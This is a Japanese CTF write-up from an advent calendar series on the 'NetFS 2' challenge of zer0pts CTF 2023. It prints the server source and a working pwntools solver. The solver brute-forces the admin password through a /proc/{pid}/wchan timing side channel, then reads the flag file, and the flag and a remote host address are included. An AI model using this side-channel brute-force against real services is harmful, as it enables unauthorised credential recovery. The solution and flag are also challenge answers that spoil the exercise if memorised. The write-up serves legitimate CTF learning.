0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

claustra01's Daily CTFAdvent Calendar 2024

Day 20

[misc] NetFS 2 (zer0pts CTF 2023) writeup

Last updated at Posted at 2024-12-20


NetFS 1の続編。パスワードが間違っていても5秒ほど待ってから切断されるようになった。

server.py
#!/usr/bin/env python3
import multiprocessing
import os
import random
import signal
import socket
import time
import re

assert os.path.isfile("secret/password.txt"), "Password file not found."

MAX_SIZE = 0x1000
LOGIN_USERS = {
    b'guest': b'guest',
    b'admin': open("secret/password.txt", "rb").read().strip()
}
PROTECTED = [b"server.py", b"secret"]

assert re.fullmatch(b"[0-9a-f]+", LOGIN_USERS[b'admin'])

class Timeout(object):
    def __init__(self, seconds):
        self.seconds = seconds
        self.start = None

    def handle_timeout(self, signum, frame):
        raise TimeoutError('Timeout')

    def wait(self):
        signal.alarm(0)
        while time.time() - self.start < self.seconds:
            time.sleep(0.1)
        time.sleep(random.random())

    def __enter__(self):
        signal.signal(signal.SIGALRM, self.handle_timeout)
        signal.alarm(self.seconds)
        self.start = time.time()
        return self

    def __exit__(self, _type, _value, _traceback):
        signal.alarm(0)
        time.sleep(random.random())

class PyNetworkFS(object):
    def __init__(self, conn):
        self._conn = conn
        self._auth = False
        self._user = None

    def __del__(self):
        self._conn.close()

    @property
    def is_authenticated(self):
        return self._auth

    @property
    def is_admin(self):
        return self.is_authenticated and self._user == b'admin'

    def response(self, message):
        self._conn.send(message)

    def recvline(self):
        data = b''
        while True:
            match self._conn.recv(1):
                case b'': return None
                case b'\n': break
                case byte: data += byte
        return data

    def authenticate(self):
        """Login prompt"""
        username = password = b''
        with Timeout(5):
            # Receive username
            self.response(b"Username: ")
            username = self.recvline()
            if username is None: return

            if username in LOGIN_USERS:
                password = LOGIN_USERS[username]
            else:
                self.response(b"No such a user exists.\n")
                return

        with Timeout(5) as timer:
            # Receive password
            self.response(b"Password: ")
            i = 0
            while i < len(password):
                c = self._conn.recv(1)
                if c == b'':
                    timer.wait()
                    self.response(b"Incorrect password.\n")
                    return
                elif c != password[i:i+1]:
                    timer.wait()
                    self.response(b"Incorrect password.\n")
                    return
                i += 1

            if self._conn.recv(1) != b'\n':
                timer.wait()
                self.response(b"Incorrect password.\n")
                return

        self.response(b"Logged in.\n")
        self._auth = True
        self._user = username

    def serve(self):
        """Serve files"""
        with Timeout(30):
            while True:
                # Receive filepath
                self.response(b"File: ")
                filepath = self.recvline()
                if filepath is None: return

                # Check filepath
                if not self.is_admin and \
                   any(map(lambda name: name in filepath, PROTECTED)):
                    self.response(b"Permission denied.\n")
                    continue

                # Serve file
                try:
                    f = open(filepath, 'rb')
                except FileNotFoundError:
                    self.response(b"File not found.\n")
                    continue
                except PermissionError:
                    self.response(b"Permission denied.\n")
                    continue
                except:
                    self.response(b"System error.\n")
                    continue

                try:
                    self.response(f.read(MAX_SIZE))
                except OSError:
                    self.response(b"System error.\n")
                finally:
                    f.close()

def pynetfs_main(conn):
    nfs = PyNetworkFS(conn)
    try:
        nfs.authenticate()
    except TimeoutError:
        nfs.response(b'Incorrect password.\n')

    if nfs.is_authenticated:
        try:
            nfs.serve()
        except TimeoutError:
            return

if __name__ == '__main__':
    # Setup server
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)

    print("Listening on 0.0.0.0:10022")
    sock.bind(('0.0.0.0', 10022))
    sock.listen(16)

    # Handle connection
    ps = []
    while True:
        conn, addr = sock.accept()
        ps.append(multiprocessing.Process(target=pynetfs_main, args=(conn,)))
        ps[-1].start()
        conn.close()
        ps = list(filter(lambda p: p.is_alive() or p.join(), ps))

パスワードが間違った時点で入力のreadは打ち切られてsleepするので、その違いをどうにかして取得できれば前問と同じようにブルートフォースでpasswordが求められる。

    elif c != password[i:i+1]:
        timer.wait()
        self.response(b"Incorrect password.\n")
        return
    def wait(self):
        signal.alarm(0)
        while time.time() - self.start < self.seconds:
            time.sleep(0.1)
        time.sleep(random.random())

これはプロセスの状態を見れば分かる。具体的には、/proc/{pid}/wchanでそのプロセスが「何の待ち状態になっているのか」を確認できる。

よって、guestでログインしてどうにかしてpidを特定し、adminログイン試行のプロセスを確認することでパスワードが間違っているか否かを判断すれば良い。

現在のプロセスの情報は/proc/self/から分かる。solverはこうなる。

from pwn import *
import time

host = "34.170.146.252"
port = 54172
# host = "localhost"
# port = 10022

# disable info log
context.log_level = "error" 

charset = "0123456789abcdef"
password = ""

while True:
  for i in range(len(charset)):
    p_guest = remote(host, port)
    time.sleep(0.1)
    p_admin = remote(host, port)

    # get pid
    p_guest.sendlineafter("Username: ", "guest")
    p_guest.sendlineafter("Password: ", "guest")
    p_guest.sendlineafter("File: ", "/proc/self/status")
    p_guest.recvuntil("Pid:")
    admin_pid = int(p_guest.recvline().strip().decode()) + 1
    # print("pid:", admin_pid)

    # bruteforce
    p_admin.recvuntil("Username:")
    p_admin.sendline("admin")
    p_admin.recvuntil("Password: ")
    p_admin.send(password + charset[i])
    time.sleep(0.1)

    p_guest.sendlineafter("File: ", "/proc/" + str(admin_pid) + "/wchan")
    recv = p_guest.recv(10)

    p_guest.close()
    p_admin.close()
    time.sleep(0.1)

    # if password is incorrect, process is in "hrtimer_nanosleep"
    # else, process is in "wait_woken"
    if b"wait_woken" in recv:
      password += charset[i]
      print(password)
      break

  if len(password) == 16:
    p = remote(host, port)
    p.sendlineafter("Username: ", "admin")
    p.sendlineafter("Password: ", password)
    p.sendlineafter("File: ", "secret/flag.txt")
    print(p.recvline())
    break

このsolverではadmin_pidguest_pid+1としているが、不特定多数のアクセスが飛んでくるCTF開催中のリモート環境では必ずしもadmin_pidguest_pidが連続するとは限らないので解けない(ことの方が多い)気がする。

とりあえず、AlpacaHackのリモート環境ではflagが得られた。
zer0pts{pr0cfs_1s_5uch_4_n1c3_0r4cl3_5d17c4e}

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?